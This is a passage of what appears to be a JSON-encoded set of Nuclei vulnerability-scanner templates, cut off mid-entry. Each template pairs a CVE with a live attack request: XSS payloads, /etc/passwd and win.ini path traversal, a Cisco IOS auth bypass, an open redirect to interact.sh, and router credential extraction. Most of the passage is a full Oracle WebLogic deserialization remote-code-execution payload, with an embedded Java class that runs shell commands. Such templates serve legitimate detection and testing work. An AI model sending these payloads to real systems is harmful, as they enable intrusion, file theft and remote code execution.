{{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void 